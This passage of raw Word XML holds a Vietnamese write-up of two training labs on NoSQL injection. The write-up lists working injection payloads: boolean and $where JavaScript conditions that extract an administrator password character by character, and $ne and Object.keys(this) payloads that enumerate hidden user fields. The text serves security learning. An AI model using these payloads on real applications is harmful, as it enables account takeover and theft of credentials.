        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657B40">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab 3:</w:t>
      </w:r>
      <w:r w:rsidR="00A35987">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E446C8" w:rsidRPr="00E446C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploiting NoSQL injection to extract data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7404A458" w14:textId="63D3F8A9" w:rsidR="00657B40" w:rsidRDefault="00E446C8" w:rsidP="00E446C8">
      <w:pPr>
        <w:ind w:left="-76"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E446C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>To solve the lab, extract the password for the administrator user, then log in to their account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A82A67F" w14:textId="2E087E60" w:rsidR="00E446C8" w:rsidRDefault="00E446C8" w:rsidP="00E446C8">
      <w:pPr>
        <w:ind w:left="-76"/>
      </w:pPr>
      <w:r w:rsidRPr="00E446C8">
        <w:lastRenderedPageBreak/>
        <w:t>Kiểm tra xem đầu vào có được đưa vào một hàm JavaScript thực thi trên server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E446C8">
        <w:t>hay không.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD551D1" w14:textId="4AF62E8A" w:rsidR="00E446C8" w:rsidRDefault="00FC3E1F" w:rsidP="00FC3E1F">
      <w:pPr>
        <w:ind w:left="-76"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Thử chèn dấu nháy đơn phía sau url </w:t>
      </w:r>
      <w:r w:rsidR="00801AA7">
        <w:t>thì hệ thống vẫn hoạt động bình thường nhưng không còn hiển thị thông tin của user wiener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD5CE60" w14:textId="491F8917" w:rsidR="00BE1C88" w:rsidRDefault="00BE1C88" w:rsidP="00FC3E1F">
      <w:pPr>
        <w:ind w:left="-76"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE1C88">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59DB03DB" wp14:editId="7382B6D6">
            <wp:extent cx="5943600" cy="13766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376680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BF9A95" w14:textId="39F84BA8" w:rsidR="00BE1C88" w:rsidRPr="00BE1C88" w:rsidRDefault="00801AA7" w:rsidP="00FC3E1F">
      <w:pPr>
        <w:ind w:left="-76"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801AA7">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="057B43DA" wp14:editId="64E6B12C">
            <wp:extent cx="3360711" cy="14326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60711" cy="1432684"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3689CECE" w14:textId="19803FFC" w:rsidR="00FC3E1F" w:rsidRDefault="00BE1C88" w:rsidP="00FC3E1F">
      <w:pPr>
        <w:ind w:left="-76"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE1C88">
        <w:t>Thử nghiệm logic Boolean:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1948989E" w14:textId="03B9E844" w:rsidR="00F70D42" w:rsidRDefault="00BE1C88" w:rsidP="00F70D42">
      <w:pPr>
        <w:ind w:left="-76"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Điều kiện sai</w:t>
      </w:r>
      <w:r w:rsidR="00F70D42">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F70D42" w:rsidRPr="00F70D42">
        <w:t>'&amp;&amp;'1'=='</w:t>
      </w:r>
      <w:r w:rsidR="00F70D42">
        <w:t>0 thì ta không nhận được kết quả của user wiener “</w:t>
      </w:r>
      <w:r w:rsidR="00F70D42">
        <w:t>Could not find user</w:t>
      </w:r>
      <w:r w:rsidR="00F70D42">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31832FDC" w14:textId="111396EE" w:rsidR="00BE1C88" w:rsidRDefault="00F70D42" w:rsidP="00F70D42">
      <w:pPr>
        <w:ind w:left="-76"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D03DAF" w14:textId="2C540733" w:rsidR="00F70D42" w:rsidRDefault="00F70D42" w:rsidP="00FC3E1F">
      <w:pPr>
        <w:ind w:left="-76"/>
      </w:pPr>
      <w:r w:rsidRPr="00F70D42">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EA50B64" wp14:editId="798C7D66">
            <wp:extent cx="5943600" cy="16325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632585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="672F5DBD" w14:textId="77777777" w:rsidR="00EA4348" w:rsidRDefault="00EA4348" w:rsidP="00FC3E1F">
      <w:pPr>
        <w:ind w:left="-76"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7502DAD5" w14:textId="77777777" w:rsidR="00EA4348" w:rsidRDefault="00EA4348" w:rsidP="00FC3E1F">
      <w:pPr>
        <w:ind w:left="-76"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43F06130" w14:textId="77777777" w:rsidR="00EA4348" w:rsidRPr="00F70D42" w:rsidRDefault="00EA4348" w:rsidP="00FC3E1F">
      <w:pPr>
        <w:ind w:left="-76"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="244B6451" w14:textId="15CB1C55" w:rsidR="00BE1C88" w:rsidRPr="00F70D42" w:rsidRDefault="00BE1C88" w:rsidP="00FC3E1F">
      <w:pPr>
        <w:ind w:left="-76"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Điều kiện đúng</w:t>
      </w:r>
      <w:r w:rsidR="00F70D42">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F70D42" w:rsidRPr="00F70D42">
        <w:t>'&amp;&amp;'1'=='1</w:t>
      </w:r>
      <w:r w:rsidR="00F70D42">
        <w:t xml:space="preserve"> thì ta nhận được kết quả user wiener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD52565" w14:textId="77777777" w:rsidR="00F70D42" w:rsidRDefault="00F70D42" w:rsidP="00FC3E1F">
      <w:pPr>
        <w:ind w:left="-76"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03FBA893" w14:textId="0E10212B" w:rsidR="00F70D42" w:rsidRDefault="00F70D42" w:rsidP="00FC3E1F">
      <w:pPr>
        <w:ind w:left="-76"/>
      </w:pPr>
      <w:r w:rsidRPr="00F70D42">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00E6881C" wp14:editId="79DBC9E7">
            <wp:extent cx="5943600" cy="21520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152015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C19FAB1" w14:textId="57D9F65B" w:rsidR="00F70D42" w:rsidRPr="00F70D42" w:rsidRDefault="00F70D42" w:rsidP="00F70D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Có sự khác nhau giữa đúng và sai do đó có thể dùng logic này để dò mật khẩu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373CD577" w14:textId="396728E3" w:rsidR="00BE1C88" w:rsidRDefault="00BE1C88" w:rsidP="00FC3E1F">
      <w:pPr>
        <w:ind w:left="-76"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Tiến hành tìm thử độ dài mật khẩu, s</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1C88">
        <w:t xml:space="preserve">ử dụng thuộc tính .length của JavaScript để </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>dò</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1C88">
        <w:t xml:space="preserve"> số lượng ký tự của mật khẩu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51389840" w14:textId="7A92A73F" w:rsidR="00F70D42" w:rsidRPr="00F70D42" w:rsidRDefault="00F70D42" w:rsidP="00FC3E1F">
      <w:pPr>
        <w:ind w:left="-76"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dùng payload </w:t>
      </w:r>
      <w:r w:rsidRPr="00F70D42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>administrator' &amp;&amp; this.password.length &lt; 30 || 'a'=='b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>sau khi dò đến độ dài pass là 9 thì hệ thống vẫn trả về thông tin administrator bình thường, đến khi length là 8 thì Could not find user -&gt; pass có 8 kí tự</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CF82B9" w14:textId="77777777" w:rsidR="00F70D42" w:rsidRDefault="00F70D42" w:rsidP="00FC3E1F">
      <w:pPr>
        <w:ind w:left="-76"/>
      </w:pPr>
      <w:r w:rsidRPr="00F70D42">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12E6F54F" wp14:editId="023C3A57">
            <wp:extent cx="5943600" cy="163131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631315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B75149" w14:textId="5865EFA5" w:rsidR="00DE6F3E" w:rsidRDefault="00DE6F3E" w:rsidP="00FC3E1F">
      <w:pPr>
        <w:ind w:left="-76"/>
      </w:pPr>
      <w:r w:rsidRPr="00DE6F3E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59A779F6" wp14:editId="4A310E71">
            <wp:extent cx="5943600" cy="18300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830070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6AD8F7" w14:textId="6727114C" w:rsidR="00BE1C88" w:rsidRDefault="00BE1C88" w:rsidP="00FC3E1F">
      <w:pPr>
        <w:ind w:left="-76"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE1C88">
        <w:lastRenderedPageBreak/>
        <w:t>Dò tìm từng ký tự</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB3D92E" w14:textId="77777777" w:rsidR="00DE6F3E" w:rsidRDefault="00DE6F3E" w:rsidP="00FC3E1F">
      <w:pPr>
        <w:ind w:left="-76"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dùng payload: dò tìm từng kí tự trong pass </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6F3E">
        <w:t>administrator' &amp;&amp; this.password[0]=='§a§</w:t>
      </w:r>
      <w:r>
        <w:t>, dò ký tự đầu tiên là ký tự nào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B56B951" w14:textId="4E28F2ED" w:rsidR="00DE6F3E" w:rsidRDefault="00DE6F3E" w:rsidP="00FC3E1F">
      <w:pPr>
        <w:ind w:left="-76"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sau khi dò ta nhận được ký tự đầu tiên là s, tương tự cho các ký tự sau </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AF4FF2" w14:textId="19FD2F36" w:rsidR="00DE6F3E" w:rsidRDefault="00DE6F3E" w:rsidP="00FC3E1F">
      <w:pPr>
        <w:ind w:left="-76"/>
      </w:pPr>
      <w:r w:rsidRPr="00DE6F3E">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2108D75A" wp14:editId="4E266095">
            <wp:extent cx="5745480" cy="3067938"/>
            <wp:effectExtent l="0" t="0" r="762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2138" cy="3076833"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC2A67B" w14:textId="6784C4BA" w:rsidR="00DE6F3E" w:rsidRDefault="00DE6F3E" w:rsidP="00FC3E1F">
      <w:pPr>
        <w:ind w:left="-76"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ta được pass hoàn chỉnh: </w:t>
      </w:r>
      <w:r w:rsidR="003D3021">
        <w:t>swezrzmy, tiến hành đăng nhập thì thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1099B56B" w14:textId="62E8A641" w:rsidR="003D3021" w:rsidRPr="00DE6F3E" w:rsidRDefault="003D3021" w:rsidP="00FC3E1F">
      <w:pPr>
        <w:ind w:left="-76"/>
      </w:pPr>
      <w:r w:rsidRPr="003D3021">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="123EF6C4" wp14:editId="60D7E50B">
            <wp:extent cx="5349240" cy="3288984"/>
            <wp:effectExtent l="0" t="0" r="381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79899" cy="3307835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1580599E" w14:textId="2FB01525" w:rsidR="00657B40" w:rsidRDefault="00657B40" w:rsidP="00657B40">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657B40">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lab 4:</w:t>
      </w:r>
      <w:r w:rsidR="00716DD7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00716DD7" w:rsidRPr="00716DD7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploiting NoSQL operator injection to extract unknown fields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F35BEF" w14:textId="26AF8983" w:rsidR="00716DD7" w:rsidRPr="00716DD7" w:rsidRDefault="00716DD7" w:rsidP="00716DD7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716DD7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>To solve the lab, log in as carlos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440CCE3C" w14:textId="48595135" w:rsidR="002A2EA6" w:rsidRPr="002A2EA6" w:rsidRDefault="002A2EA6" w:rsidP="002A2EA6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A2EA6">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Tiến hành đăng nhập thử với tên đăng nhập và carlos và pass dùng $ne thì hệ thống trả về tài khoản đã bị khóa yêu cầu reset pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138F9E75" w14:textId="2F5EB88F" w:rsidR="002A2EA6" w:rsidRDefault="002A2EA6" w:rsidP="002A2EA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A2EA6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FDB154C" wp14:editId="72CCEC28">
            <wp:extent cx="3467584" cy="95263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67584" cy="952633"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="360F7DFF" w14:textId="7ADFE6E3" w:rsidR="002A2EA6" w:rsidRDefault="002A2EA6" w:rsidP="002A2EA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A2EA6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AA983AE" wp14:editId="759251BF">
            <wp:extent cx="5943600" cy="3081655"/>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081655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C4FA0E" w14:textId="78124140" w:rsidR="002A2EA6" w:rsidRPr="00EA4348" w:rsidRDefault="002A2EA6" w:rsidP="002A2EA6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA4348">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Tiến hành thêm </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA4348">
        <w:t>tham số "$where": "1" vào JSON</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA4348">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E42CB0" w:rsidRPr="00EA4348">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>thì ta vẫn nhận được kết quả là account bị khóa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F14CA5B" w14:textId="77D821AD" w:rsidR="00E42CB0" w:rsidRDefault="00E42CB0" w:rsidP="002A2EA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E42CB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3990D020" wp14:editId="038D3338">
            <wp:extent cx="3886742" cy="543001"/>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886742" cy="543001"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEF4DCE" w14:textId="0BF06598" w:rsidR="00E42CB0" w:rsidRPr="00EA4348" w:rsidRDefault="00E42CB0" w:rsidP="002A2EA6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA4348">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Sửa lại tham số </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA4348">
        <w:t>"$where": "</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA4348">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA4348">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA4348">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> thì lúc này ta nhận được kết quả từ hệ thống là </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA4348">
        <w:t>Invalid username or password</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA4348">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> từ đó ta biết được s</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA4348">
        <w:t>erver cho phép thực thi mã JavaScript tùy ý qua $where</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E9AD8C" w14:textId="4FB6EB54" w:rsidR="00E42CB0" w:rsidRDefault="00E42CB0" w:rsidP="002A2EA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E42CB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="376ECDC8" wp14:editId="30D94A73">
            <wp:extent cx="3696216" cy="581106"/>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696216" cy="581106"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6414CC1E" w14:textId="2005F0D8" w:rsidR="00E42CB0" w:rsidRDefault="00E42CB0" w:rsidP="002A2EA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E42CB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EF54744" wp14:editId="42BBC967">
            <wp:extent cx="3991532" cy="1428949"/>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991532" cy="1428949"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7035004F" w14:textId="4BDBE98A" w:rsidR="00E42CB0" w:rsidRPr="00EA4348" w:rsidRDefault="00E42CB0" w:rsidP="002A2EA6">
      <w:r w:rsidRPr="00EA4348">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Tiếp theo do ta </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA4348">
        <w:t xml:space="preserve">không biết tên trường chứa token, </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA4348">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">do đó </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA4348">
        <w:t>phải dùng hàm Object.keys(this) để liệt kê các thuộc tính của đối tượng User</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA4348">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>, m</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA4348">
        <w:t>ục tiêu là tìm ra tên của trường chứa token khôi phục mật khẩu bằng cách sử dụng Object.keys(this).</w:t>
      </w:r>
      <w:r w:rsidR="002356EC" w:rsidRPr="00EA4348">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324CDBCD" w14:textId="011EEEAC" w:rsidR="002356EC" w:rsidRPr="00EA4348" w:rsidRDefault="002356EC" w:rsidP="002A2EA6">
      <w:r w:rsidRPr="00EA4348">
        <w:t xml:space="preserve">Vào forgot password và tìm tên Carlos để </w:t>
      </w:r>
      <w:r w:rsidR="00557638" w:rsidRPr="00EA4348">
        <w:t>tạo 1 request đến server, từ đó ta mới có thể dò được các trường chẳng hạn như token để reset pass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C9EEE6" w14:textId="161C4848" w:rsidR="00557638" w:rsidRDefault="00557638" w:rsidP="002A2EA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dùng payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197BF16D" w14:textId="05390C46" w:rsidR="00716DD7" w:rsidRPr="00716DD7" w:rsidRDefault="00716DD7" w:rsidP="00716DD7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716DD7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>{"username":"carlos",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197BF16D" w14:textId="05390C46" w:rsidR="00716DD7" w:rsidRPr="00716DD7" w:rsidRDefault="00716DD7" w:rsidP="00716DD7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716DD7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">"password":{"$ne":"invalid"}, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197BF16D" w14:textId="05390C46" w:rsidR="00716DD7" w:rsidRPr="00716DD7" w:rsidRDefault="00716DD7" w:rsidP="00716DD7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716DD7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>"$where":"Object.keys(this)[</w:t>
      </w:r>
      <w:r w:rsidR="002356EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00716DD7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>].match('^.{0}a.*')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197BF16D" w14:textId="05390C46" w:rsidR="00376F71" w:rsidRDefault="00716DD7" w:rsidP="00716DD7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716DD7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
      <w:r w:rsidR="002356EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
